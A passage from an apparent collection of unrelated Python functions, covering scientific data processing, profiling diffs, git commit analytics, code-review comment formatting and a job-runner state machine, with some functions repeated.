{}\r\n b_time = copy.copy(b_time_)\r\n for a, ta in a_time.items():\r\n r.setdefault(a, 0)\r\n tb = b_time.pop(a, 0)\r\n r[a] += ta - tb\r\n\r\n #they are missing in a\r\n for a, t in b_time.items():\r\n r.setdefault(a, 0)\r\n r[a] += t\r\n return r\r\n\r\n compile_time = self.compile_time - other.compile_time\r\n fct_call_time = diff_dict(self.fct_call_time, other.fct_call_time)\r\n fct_call = diff_dict(self.fct_call, other.fct_call)\r\n apply_time = diff_dict(self.apply_time, other.apply_time)\r\n apply_cimpl = self.apply_cimpl and other.apply_cimpl\r\n message = self.message\r\n variable_shape = diff_dict(self.variable_shape, other.variable_shape)\r\n self_linker_time = sum([ps.linker_time for ps\r\n in self.profile_stats.values()])\r\n other_linker_time = sum([ps.linker_time for ps\r\n in other.profile_stats.values()])\r\n self_optimizer_time = sum([ps.optimizer_time for ps\r\n in self.profile_stats.values()])\r\n other_optimizer_time = sum([ps.optimizer_time for ps\r\n in other.profile_stats.values()])\r\n\r\n other_time = {'linker_time': self_linker_time - other_linker_time,\r\n 'optimizer_time': self_optimizer_time -\r\n other_optimizer_time}\r\n self.print_summary_(\"print_diff_summary\", compile_time,\r\n fct_call_time, fct_call,\r\n apply_time, apply_cimpl, message, variable_shape,\r\n print_apply=False, other_time=other_time,\r\n **kwargs)", "def 
postIdealizedAnalysis(inpath, outpath, member,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # SENSvals file naming conventions\n sensval_varstrings = [\"GPH_300\", \"GPH_500\", \"GPH_700\", \"GPH_850\", \"SKIP\",\n \"T_300\", \"T_500\", \"T_700\", \"T_850\", \"T_925\",\n \"U_300\", \"U_500\", \"U_700\", \"U_850\", \"U_925\",\n \"V_300\", \"V_500\", \"V_700\", \"V_850\", \"V_925\",\n \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\",\n \"SKIP\", \"SKIP\", \"Q_850\", \"SKIP\", \"SLP\", \"T2\",\n \"TD2\", \"U10\", \"V10\"]\n # Post-processed new file naming conventions\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n # Get more dimensions/geographical info\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Open dataset and start pulling member fields\n member_fields = np.zeros((len(sensval_varstrings), wrf_jdim, wrf_idim))\n sensvar_dat = Dataset(inpath)\n for ind, var in enumerate(sensval_varstrings):\n # print(\"SENSvals variable:\", var, \"New variable string\", sensstringslist[ind])\n if var != \"SKIP\":\n member_fields[ind] = sensvar_dat[var][member-1][:]\n newvar = new_analysis.createVariable(\n sensstringslist[ind].replace(\" \",\"_\"),\n member_fields[ind].dtype,\n dimensions=('lat','lon'))\n newvar[:,:] = member_fields[ind]\n new_analysis.close()\n return", "def postIdealizedAnalysis(inpath, outpath, member,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # SENSvals file naming conventions\n sensval_varstrings = [\"GPH_300\", \"GPH_500\", \"GPH_700\", \"GPH_850\", \"SKIP\",\n \"T_300\", \"T_500\", \"T_700\", \"T_850\", \"T_925\",\n \"U_300\", \"U_500\", \"U_700\", \"U_850\", \"U_925\",\n \"V_300\", \"V_500\", \"V_700\", \"V_850\", \"V_925\",\n \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\", \"SKIP\",\n \"SKIP\", \"SKIP\", \"Q_850\", \"SKIP\", \"SLP\", \"T2\",\n \"TD2\", \"U10\", \"V10\"]\n # Post-processed new file naming conventions\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 
hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n # Get more dimensions/geographical info\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Open dataset and start pulling member fields\n member_fields = np.zeros((len(sensval_varstrings), wrf_jdim, wrf_idim))\n sensvar_dat = Dataset(inpath)\n for ind, var in enumerate(sensval_varstrings):\n # print(\"SENSvals variable:\", var, \"New variable string\", sensstringslist[ind])\n if var != \"SKIP\":\n member_fields[ind] = sensvar_dat[var][member-1][:]\n newvar = new_analysis.createVariable(\n sensstringslist[ind].replace(\" \",\"_\"),\n member_fields[ind].dtype,\n dimensions=('lat','lon'))\n newvar[:,:] = member_fields[ind]\n new_analysis.close()\n return", "def _pop_path(diffs):\n key = None\n popped_diffs = []\n for d in diffs:\n # Empty diffs can be skipped\n if d is None or len(d) == 0:\n popped_diffs.append(None)\n continue\n # Check that we have only one op, which is a patch op\n if len(d) != 1 or d[0].op != DiffOp.PATCH:\n return\n # Ensure all present diffs have the same key\n if key is None:\n key = d[0].key\n elif key != d[0].key:\n return\n # Ensure the sub diffs of all ops are suitable as outer layer\n # if d[0].diff.length > 1:\n # return\n popped_diffs.append(d[0].diff)\n if key is None:\n return\n return {'key': key, 'diffs': popped_diffs}", "def analyze(errors_log_fp: str, visualization_fp: str):\n # Read lines from errors log\n with open(errors_log_fp, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n\n # Process lines\n tn_error_cases, itn_error_cases = [], []\n for ix in range(0, len(lines), 8):\n mode_line = lines[ix]\n info_lines = lines[ix + 1 : ix + 7]\n # Append new error case\n if mode_line.startswith('Forward Problem'):\n mode = constants.TN_MODE\n tn_error_cases.append(ErrorCase.from_lines(info_lines, mode))\n elif mode_line.startswith('Backward Problem'):\n mode = constants.ITN_MODE\n itn_error_cases.append(ErrorCase.from_lines(info_lines, mode))\n\n # Basic stats\n print('---- Text Normalization ----')\n print('Number of TN errors: {}'.format(len(tn_error_cases)))\n\n print('---- Inverse Text Normalization ---- ')\n print('Number of ITN errors: {}'.format(len(itn_error_cases)))\n\n # Produce a visualization\n with open(visualization_fp, 'w+', encoding='utf-8') as f:\n # Appendix\n f.write('Appendix</br>')\n f.write('<a href=\"#tn_section\">Text Normalization Analysis.</a></br>')\n f.write('<a href=\"#itn_section\">Inverse Text Normalization Analysis.</a>')\n\n # TN Section\n f.write('<h2 id=\"tn_section\">Text Normalization</h2>\\n')\n for errorcase in tn_error_cases:\n f.write(errorcase.get_html())\n\n # ITN Section\n f.write('<h2 id=\"itn_section\">Inverse Text Normalization</h2>\\n')\n for errorcase in itn_error_cases:\n f.write(errorcase.get_html())", "def getStiff(self, calc, **kwargs):\n elements = [e for e in self.elements if e.dim == 2]\n ns = 
len(self.nodes)\n self.stiff = zeros((ns, ns))\n for e in elements:\n calc(e)\n indexes = [(n1.i - 1, n2.i-1) for n1 in e.nodes for n2 in e.nodes]\n for i, p in enumerate(indexes):\n x, y = p\n self.stiff[x, y] += e.M.flat[i]\n return self.stiff", "def compareAB(model1_name, model2_name, X_test_B, X_test_S, analysis_dir=\"Analysis/\"):\n #Load best weights\n model = tf.keras.models.load_model(\"Models/\"+model1_name)\n bkg_preds1 = model.predict(X_test_B).flatten()\n sig_preds1 = model.predict(X_test_S).flatten()\n\n model = tf.keras.models.load_model(\"Models/\"+model2_name)\n bkg_preds2 = model.predict(X_test_B).flatten()\n sig_preds2 = model.predict(X_test_S).flatten()\n\n sig_eff = []\n bkg_eff = []\n sig_eff_50 = 1.0\n bkg_eff_50 = 1.0\n for thresh in (1-np.arange(0.00005, 0.8, 0.01)):\n bkg_eff_temp = np.sum(bkg_preds1 > thresh)/len(bkg_preds1)\n sig_eff_temp = np.sum(sig_preds1 > thresh)/len(sig_preds1)\n sig_eff.append(sig_eff_temp)\n bkg_eff.append(1/bkg_eff_temp)\n if abs(sig_eff_temp-0.5) < abs(sig_eff_50-0.5):\n sig_eff_50 = sig_eff_temp\n bkg_eff_50 = 1/bkg_eff_temp\n plt.semilogy(sig_eff, bkg_eff)\n plt.annotate(model1_name + ' Background rejection @0.5 Signal efficiency = {:.2e}'.format(bkg_eff_50), xy=(0.05, 0.95), xycoords='axes fraction')\n print(sig_eff_50)\n\n sig_eff = []\n bkg_eff = []\n sig_eff_50 = 1.0\n bkg_eff_50 = 1.0\n for thresh in (1-np.arange(0.00005, 0.8, 0.01)):\n bkg_eff_temp = np.sum(bkg_preds2 > thresh)/len(bkg_preds2)\n sig_eff_temp = np.sum(sig_preds2 > thresh)/len(sig_preds2)\n sig_eff.append(sig_eff_temp)\n bkg_eff.append(1/bkg_eff_temp)\n if abs(sig_eff_temp-0.5) < abs(sig_eff_50-0.5):\n sig_eff_50 = sig_eff_temp\n bkg_eff_50 = 1/bkg_eff_temp\n plt.semilogy(sig_eff, bkg_eff)\n plt.annotate(model2_name + ' Background rejection @0.5 Signal efficiency = {:.3e}'.format(bkg_eff_50), xy=(0.05, 0.88), xycoords='axes fraction')\n print(sig_eff_50)\n\n plt.legend([model1_name, model2_name])\n plt.xlabel(\"Signal efficiency\")\n plt.ylabel(\"Background rejection\")\n plt.gcf().set_size_inches(8.3, 5.85)\n plt.savefig(analysis_dir+\"ROC\" + model1_name + \"VS\" + model2_name + \".pdf\", format=\"pdf\")\n plt.show()", "def preprocess(self):\n travel_path = []\n current_location = None\n last_valid_location = None\n change_at_day = None\n location_candidate = None\n\n for commit in self.raw_data:\n commit_time = commit.commit_time\n commit_timezone = commit.commit_time_offset\n if commit_timezone is None:\n continue\n\n zones = self.session.query(TimezoneInterval.timezone) \\\n .filter(TimezoneInterval.start <= commit_time) \\\n .filter(TimezoneInterval.end > commit_time) \\\n .filter(TimezoneInterval.utcoffset == commit_timezone) \\\n .all()\n\n # Create the initial timezone\n if current_location is None:\n current_location = {\n 'set': set([z[0] for z in zones]),\n 'full_set': set([z[0] for z in zones]),\n 'start': commit_time.date(),\n 'end': commit_time.date(),\n }\n last_valid_location = commit_time.date()\n\n continue\n\n # We got a timezone and need to check if we are still in it or if there is a change\n # Get possible timezone candidates for this commit and intersect them with the current_location set\n location = set([z[0] for z in zones])\n intersection = location & current_location['set']\n # Check if the possible timezones of this commit matches any timezone of the current set.\n if len(intersection) > 0:\n # By reassigning the intersected set we gain additional precision by considering possible specific DST changes\n current_location['set'] = 
intersection\n current_location['end'] = commit_time.date()\n last_valid_location = commit_time.date()\n\n # There is no match between the possible timezones and the current set.\n # In this case we need to check if this is a single occurrence (anomaly) or\n # If this is an actual change.\n else:\n # No change_at_day exists, but we detected a change\n # Remember the change. If this change lasts for at least a day it will be marked.\n if change_at_day is None:\n change_at_day = commit.commit_time.date()\n location_candidate = {\n 'set': set([z[0] for z in zones]),\n 'full_set': set([z[0] for z in zones]),\n 'start': commit_time.date(),\n 'end': commit_time.date(),\n }\n\n # No change detected\n if change_at_day is None:\n continue\n\n # There was an anomaly, but not for a whole day.\n # This could for instance be a developer committing from a remote server.\n if change_at_day <= last_valid_location:\n change_at_day = None\n location_candidate = None\n\n continue\n\n # The change is not older than a day\n # ignore it until the change lasts for longer than a day\n if change_at_day <= last_valid_location:\n continue\n\n # There exists a change from the last day.\n duration = current_location['end'] - current_location['start']\n\n # The current_location set exists only for a single day.\n # This is most likely an outlier. Thereby drop it and restore the last timezone.\n if duration < timedelta(days=1) and len(travel_path) > 0:\n last_location = travel_path.pop()\n last_location['end'] = current_location['end']\n current_location = last_location\n\n # Check if the old location and the current candidate actually match\n # If that's the case drop the candidate and completely replace the current_location set\n intersection = location_candidate['set'] & current_location['set']\n if len(intersection) > 0:\n # Update current_timezone\n current_location['set'] = intersection\n current_location['end'] = commit_time.date()\n current_location['full_set'] = current_location['full_set'] | location_candidate['set']\n\n # Reset candidate and last_valid_location occurrence\n last_valid_location = commit_time.date()\n change_at_day = None\n location_candidate = None\n\n continue\n\n # We detected a change and it seems to be valid.\n # Save the current timezone and set the candidate as the current timezone.\n travel_path.append(current_location)\n current_location = location_candidate\n change_at_day = None\n location_candidate = None\n last_valid_location = commit_time.date()\n\n current_location['end'] = datetime.now().date()\n travel_path.append(current_location)\n\n home_location_candidates = []\n home_location = None\n found = False\n # Try to find the current home timezone:\n for location in travel_path:\n duration = location['end'] - location['start']\n\n # Try to find a set which intersects with the current set\n for candidate in home_location_candidates:\n intersection = location['set'] & candidate['set']\n # Found an intersection, set the new intersection and increment days\n if len(intersection) > 0:\n candidate['set'] = intersection\n candidate['days'] += duration.days\n candidate['full_set'] = location['full_set'] | candidate['full_set']\n found = True\n if candidate['days'] > home_location['days']:\n home_location = candidate\n\n break\n\n if not found:\n location['days'] = duration.days\n home_location_candidates.append(location)\n else:\n found = False\n\n if not home_location:\n home_location = location\n\n self.data = travel_path\n self.home_zone = home_location\n self.different_timezones = 
len(home_location_candidates)", "def print_diff_summary(self, other, **kwargs):\n\n def diff_dict(a_time, b_time_):\n r = {}\n b_time = copy.copy(b_time_)\n for a, ta in iteritems(a_time):\n r.setdefault(a, 0)\n tb = b_time.pop(a, 0)\n r[a] += ta - tb\n\n # they are missing in a\n for a, t in iteritems(b_time):\n r.setdefault(a, 0)\n r[a] += t\n return r\n\n compile_time = self.compile_time - other.compile_time\n fct_call_time = diff_dict(self.fct_call_time, other.fct_call_time)\n fct_call = diff_dict(self.fct_call, other.fct_call)\n apply_time = diff_dict(self.apply_time, other.apply_time)\n apply_cimpl = self.apply_cimpl and other.apply_cimpl\n message = self.message\n variable_shape = diff_dict(self.variable_shape, other.variable_shape)\n self_linker_time = sum([ps.linker_time for ps\n in self.profile_stats.values()])\n other_linker_time = sum([ps.linker_time for ps\n in other.profile_stats.values()])\n self_optimizer_time = sum([ps.optimizer_time for ps\n in self.profile_stats.values()])\n other_optimizer_time = sum([ps.optimizer_time for ps\n in other.profile_stats.values()])\n\n other_time = {'linker_time': self_linker_time - other_linker_time,\n 'optimizer_time': self_optimizer_time -\n other_optimizer_time}\n self.print_summary_(\"print_diff_summary\", compile_time,\n fct_call_time, fct_call,\n apply_time, apply_cimpl, message, variable_shape,\n print_apply=False, other_time=other_time,\n **kwargs)", "def _get_draft_details(request, comments):\n last_key = None\n output = []\n linecache = {} # Maps (c.patch_key, c.left) to mapping (lineno, line)\n modified_patches = []\n fetch_base_failed = False\n\n for c in comments:\n patch = c.patch_key.get()\n if (patch.key, c.left) != last_key:\n url = request.build_absolute_uri(\n reverse(diff, args=[request.issue.key.id(),\n patch.patchset_key.id(),\n patch.filename]))\n output.append('\\n%s\\nFile %s (%s):' % (url, patch.filename,\n c.left and \"left\" or \"right\"))\n last_key = (patch.key, c.left)\n if patch.no_base_file:\n linecache[last_key] = _patchlines2cache(\n patching.ParsePatchToLines(patch.lines), c.left)\n else:\n try:\n if c.left:\n old_lines = patch.get_content().text.splitlines(True)\n linecache[last_key] = dict(enumerate(old_lines, 1))\n else:\n new_lines = patch.get_patched_content().text.splitlines(True)\n linecache[last_key] = dict(enumerate(new_lines, 1))\n except FetchError:\n linecache[last_key] = _patchlines2cache(\n patching.ParsePatchToLines(patch.lines), c.left)\n fetch_base_failed = True\n context = linecache[last_key].get(c.lineno, '').strip()\n url = request.build_absolute_uri(\n '%s#%scode%d' % (reverse(diff, args=[request.issue.key.id(),\n patch.patchset_key.id(),\n patch.filename]),\n c.left and \"old\" or \"new\",\n c.lineno))\n output.append('\\n%s\\n%s:%d: %s\\n%s' % (url, patch.filename, c.lineno,\n context, c.text.rstrip()))\n if modified_patches:\n ndb.put_multi(modified_patches)\n return '\\n'.join(output)", "def __do_analysis(self):\n #Step 1: connect to mongodb and pick a streamer\n dbclient = db_connect.DBClient()\n streamer_data = dbclient.analyze_number_of_stream_viewers(self.streamer)\n streamer_messeges_data = dbclient.analyzeStream(self.streamer)\n\n timearr = []\n messagesarr = []\n streamer_timearr = []\n num_chattersarr = []\n\n #create time and messages array for plotting purposes\n for entry in streamer_messeges_data:\n timearr.append(entry['start_time'])\n messagesarr.append(entry['messeges_count'] * entry['messeges_count'])\n #print(entry['start_time'])\n\n #create time and chatters 
array for plotting purposes\n for entry in streamer_data:\n streamer_timearr.append(entry['deltatime_from_start_of_clip'])\n num_chattersarr.append(entry['num_viewers'])\n\n # print('start time: ' + str(timearr[0]))\n # print('end time: ' + str(timearr[-1]))\n # print('duration: ' + str(timearr[-1] - timearr[0]))\n # print('average views/min = ' + str(sum(messagesarr) / len(messagesarr)))\n\n average_message_count = sum(messagesarr) / len(messagesarr)\n\n averagearr = []\n plotting_time_arr = []\n labelarr = []\n\n for i in range(len(timearr)):\n averagearr.append(average_message_count*1.8)\n #print(str(timearr[i]) + ' converts to ' + str(datetime.datetime(2020, 1, 1, 0, 0) + timearr[i]))\n plotting_time_arr.append(datetime.datetime(2020, 1, 1, 0, 0) + timearr[i])\n labelarr.append(str(i))\n\n plotting_streamer_timearr = []\n for i in range(len(streamer_timearr)):\n plotting_streamer_timearr.append(datetime.datetime(2020, 1, 1, 0, 0) + streamer_timearr[i])\n\n #plot messages and cuttoff\n messeges_over_time_fig = pyplot.figure(1)\n messeges_over_time_fig.set_figheight(15)\n messeges_over_time_fig.set_figwidth(30)\n messeges_over_time_fig.suptitle(self.streamer + \"'s video data\")\n messeges_over_time_sub = messeges_over_time_fig.add_subplot(211)\n\n pyplot.plot(plotting_time_arr,messagesarr,label='messages/min')\n dots = pyplot.plot(plotting_time_arr,messagesarr,'bo',label='messages/min')\n\n #label dots\n count = 0\n last_entry_was_above_line = False\n for i in range(len(plotting_time_arr)):\n #print(str(count) +': comparing ' + str(messagesarr[i]) + ' with ' + str(averagearr[i]))\n if(messagesarr[i] > averagearr[i]):\n if(last_entry_was_above_line):\n #Don't increment the count because this is part of the same clip\n count = count\n else:\n #new clip above the line, increment clip count\n count = count + 1\n messeges_over_time_sub.annotate(count,xy=(plotting_time_arr[i],messagesarr[i]))\n last_entry_was_above_line = True\n else:\n last_entry_was_above_line = False\n # messeges_over_time_sub.annotate('NA',xy=(plotting_time_arr[i],messagesarr[i]))\n\n #finish plotting\n pyplot.plot(plotting_time_arr, averagearr,'',label='average')\n pyplot.gcf().autofmt_xdate()\n pyplot.ylabel('Messeges*Messeges')\n pyplot.xlabel('Time')\n\n viewers_over_time_sub = messeges_over_time_fig.add_subplot(212)\n\n pyplot.plot(plotting_streamer_timearr,num_chattersarr,label='num chatters')\n pyplot.ylabel('Chatters')\n pyplot.xlabel('Time')\n\n pyplot.tight_layout()\n pyplot.savefig(output_file_location+self.streamer+'.png')\n print('saved chart to ' + output_file_location+self.streamer+'.png')\n # pyplot.show()\n return average_message_count, streamer_messeges_data", "def legitimate_mark_changes(self, verbose=False):\n if self._undirected:\n raise ValueError('Only defined for DMAGs')\n\n disc_paths = self.discriminating_paths()\n\n mark_changes_dir = set()\n for i, j in self._directed:\n if verbose: print(f'{i}->{j} => {i}<->{j} ?')\n # FIRST CONDITIONS\n parents_condition = all(self.has_directed(parent, j) for parent in self._parents[i])\n if not parents_condition:\n if verbose: print('Failed parents condition')\n continue\n spouses_condition = all(self.has_any_edge(spouse, j) for spouse in self._spouses[i])\n if not spouses_condition:\n if verbose: print('Failed spouses condition')\n continue\n\n # SECOND CONDITION\n disc_paths_for_i = [path for path in disc_paths.keys() if path[-2] == i]\n disc_paths_condition = all(path[-1] != j for path in disc_paths_for_i)\n if not disc_paths_condition:\n if verbose: 
print('Failed discriminating path condition')\n continue\n\n # FINAL CONDITION\n if i in self.ancestors_of(j, exclude_arcs={(i, j)}):\n if verbose: print('Failed ancestral condition')\n continue\n\n if verbose: print('Passed')\n mark_changes_dir.add((i, j))\n\n mark_changes_bidir = set()\n for i, j in self._bidirected | set(map(reversed, self._bidirected)):\n if verbose: print(f'{i}<->{j} => {i}->{j} ?')\n # FIRST CONDITIONS\n parents_condition = all(self.has_directed(parent, j) for parent in self._parents[i])\n if not parents_condition:\n if verbose: print('Failed parents condition')\n continue\n spouses_condition = all(self.has_any_edge(spouse, j) for spouse in self._spouses[i] if spouse != j)\n if not spouses_condition:\n if verbose: print('Failed spouses condition')\n continue\n\n # SECOND CONDITION\n disc_paths_for_i = [path for path in disc_paths.keys() if path[-2] == i]\n disc_paths_condition = all(path[-1] != j for path in disc_paths_for_i)\n if not disc_paths_condition:\n if verbose: print('Failed discriminating path condition')\n continue\n\n # FINAL CONDITION\n if i in self.ancestors_of(j):\n if verbose: print('Failed ancestral condition')\n continue\n\n if verbose: print('Passed')\n mark_changes_bidir.add((i, j))\n\n return mark_changes_dir, mark_changes_bidir", "def deal_lines(self, lines, conf):\n if lines == ['']:\n print \"NO new %s commit!\" % conf\n else:\n for line in lines:\n if re.search('\\d+ files? changed', line) is None:\n pos = line.find(' ')\n if pos != -1:\n try:\n parts = line.split(' ', 2)\n commit_id = parts[0]\n self.current_commit = commit_id\n stamp = int(parts[1])\n ti = datetime.datetime.fromtimestamp(float(stamp))\n s_time = datetime.datetime.fromtimestamp(float(0))\n if self.start_date == s_time:\n self.start_date = ti\n elif self.start_date > ti:\n self.start_date = ti\n author, mail = parts[2].split('<', 1)\n message = mail.split('> ', 1)[1]\n mail = mail.split('>', 1)[0]\n if re.search(': ', message) is not None:\n messagetype = message.split(': ', 1)[0]\n if messagetype not in CLASSIFICATION:\n messagetype = 'OTR'\n else:\n messagetype = 'OTR'\n if commit_id not in self.commit_dictionary:\n self.commit_dictionary[commit_id]\\\n = [commit_id, mail,\n stamp, messagetype,\n messagetype, 0, 0, 0, 0]\n # [files, inserted, deleted, total_lines]\n if mail not in self.author_dictionary:\n self.author_dictionary[mail] = [author,\n mail, 0, 0,\n 0, 0, 1,\n stamp]\n # [files,inserted,deleted,total_lines,commit,stamp]\n else:\n self.author_dictionary[mail][6] += 1\n if stamp > self.author_dictionary[mail][7]:\n self.author_dictionary[mail][7] = stamp\n self.total_patches += 1\n except:\n print 'Warning: unexpected line \"%s\"' % line\n else:\n if conf == 'no_merges':\n try:\n commit_id = self.current_commit\n numbers = self.getstatsummarycounts(line)\n if len(numbers) == 3:\n (files, inserted, deleted) = \\\n map(lambda el: int(el), numbers)\n total_lines = inserted - deleted\n self.commit_dictionary[commit_id][5] = files\n self.commit_dictionary[commit_id][6] = inserted\n self.commit_dictionary[commit_id][7] = deleted\n self.commit_dictionary[commit_id][8] = total_lines\n self.author_dictionary[mail][2] += files\n self.author_dictionary[mail][3] += inserted\n self.author_dictionary[mail][4] += deleted\n self.author_dictionary[mail][5] += total_lines\n self.total_lines_inserted += inserted\n self.total_lines_deleted += deleted\n self.total_lines += total_lines\n self.current_commit = None\n except:\n print 'Warning: unexpected line \"%s\"' % line", "def 
_transition_from_PREPARING(self, run_state):\n\n def mount_dependency(dependency, shared_file_system):\n if not shared_file_system:\n # Set up symlinks for the content at dependency path\n Path(dependency.child_path).parent.mkdir(parents=True, exist_ok=True)\n os.symlink(dependency.docker_path, dependency.child_path)\n # The following will be converted into a Docker volume binding like:\n # dependency_path:docker_dependency_path:ro\n docker_dependencies.append((dependency.parent_path, dependency.docker_path))\n\n if run_state.is_killed or run_state.is_restaged:\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=f'the bundle was {\"killed\" if run_state.is_killed else \"restaged\"}',\n )\n return run_state._replace(stage=RunStage.CLEANING_UP)\n\n # Check CPU and GPU availability\n try:\n cpuset, gpuset = self.assign_cpu_and_gpu_sets_fn(\n run_state.resources.cpus, run_state.resources.gpus\n )\n except Exception as e:\n message = \"Unexpectedly unable to assign enough resources to bundle {}: {}\".format(\n run_state.bundle.uuid, str(e)\n )\n logger.error(message)\n logger.error(traceback.format_exc())\n return run_state._replace(run_status=message)\n\n dependencies_ready = True\n status_messages = []\n dependency_keys_to_paths: Dict[DependencyKey, str] = dict()\n\n if not self.shared_file_system:\n # No need to download dependencies if we're in the shared FS,\n # since they're already in our FS\n for dep in run_state.bundle.dependencies:\n dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)\n\n try:\n # Fetching dependencies from the Dependency Manager can fail.\n # Just update the download status on the next iteration of this transition function.\n dependency_state = self.dependency_manager.get(run_state.bundle.uuid, dep_key)\n dependency_keys_to_paths[dep_key] = os.path.join(\n self.dependency_manager.dependencies_dir, dependency_state.path\n )\n except Exception:\n status_messages.append(f'Downloading dependency {dep.child_path} failed')\n dependencies_ready = False\n continue\n\n if dependency_state.stage == DependencyStage.DOWNLOADING:\n status_messages.append(\n 'Downloading dependency %s: %s done (archived size)'\n % (dep.child_path, size_str(dependency_state.size_bytes))\n )\n dependencies_ready = False\n elif dependency_state.stage == DependencyStage.FAILED:\n # Failed to download dependency; -> CLEANING_UP\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=f'Dependency has failed for this bundle. Dependency child uuid: {dep.child_uuid}. Dependency child path: {dep.child_path}',\n )\n return run_state._replace(\n stage=RunStage.CLEANING_UP,\n failure_message='Failed to download dependency %s: %s'\n % (dep.child_path, dependency_state.message),\n )\n\n # get the docker image\n docker_image = run_state.resources.docker_image\n image_state = self.image_manager.get(docker_image)\n if image_state.stage == DependencyStage.DOWNLOADING:\n status_messages.append(\n 'Pulling docker image %s. 
%s' % (docker_image, image_state.message)\n )\n dependencies_ready = False\n elif image_state.stage == DependencyStage.FAILED:\n # Failed to pull image; -> CLEANING_UP\n message = 'Failed to download Docker image: %s' % image_state.message\n logger.error(message)\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)\n\n # stop proceeding if dependency and image downloads aren't all done\n if not dependencies_ready:\n status_message = status_messages.pop()\n if status_messages:\n status_message += \"(and downloading %d other dependencies and docker images)\" % len(\n status_messages\n )\n logger.info(\n f'bundle is not ready yet. uuid: {run_state.bundle.uuid}. status message: {status_message}'\n )\n return run_state._replace(run_status=status_message)\n\n # All dependencies ready! Set up directories, symlinks and container. Start container.\n # 1) Set up a directory to store the bundle.\n if self.shared_file_system:\n if not os.path.exists(run_state.bundle_path):\n if run_state.bundle_dir_wait_num_tries == 0:\n message = (\n \"Bundle directory cannot be found on the shared filesystem. \"\n \"Please ensure the shared filesystem between the server and \"\n \"your worker is mounted properly or contact your administrators.\"\n )\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=\"Bundle directory cannot be found on the shared filesystem.\",\n )\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)\n next_bundle_dir_wait_num_tries = run_state.bundle_dir_wait_num_tries - 1\n logger.info(\n f'Waiting for bundle directory to be created by the server, uuid: {run_state.bundle.uuid}, bundle_dir_wait_num_tries: {next_bundle_dir_wait_num_tries}'\n )\n return run_state._replace(\n run_status=\"Waiting for bundle directory to be created by the server\",\n bundle_dir_wait_num_tries=next_bundle_dir_wait_num_tries,\n )\n else:\n os.makedirs(run_state.bundle_path, exist_ok=True)\n\n # 2) Set up symlinks\n docker_dependencies = []\n docker_dependencies_path = (\n RunStateMachine._ROOT\n + run_state.bundle.uuid\n + ('_dependencies' if not self.shared_file_system else '')\n )\n\n for dep in run_state.bundle.dependencies:\n full_child_path = os.path.normpath(os.path.join(run_state.bundle_path, dep.child_path))\n to_mount = []\n if self.shared_file_system:\n # TODO(Ashwin): make this not fs-specific.\n # On a shared 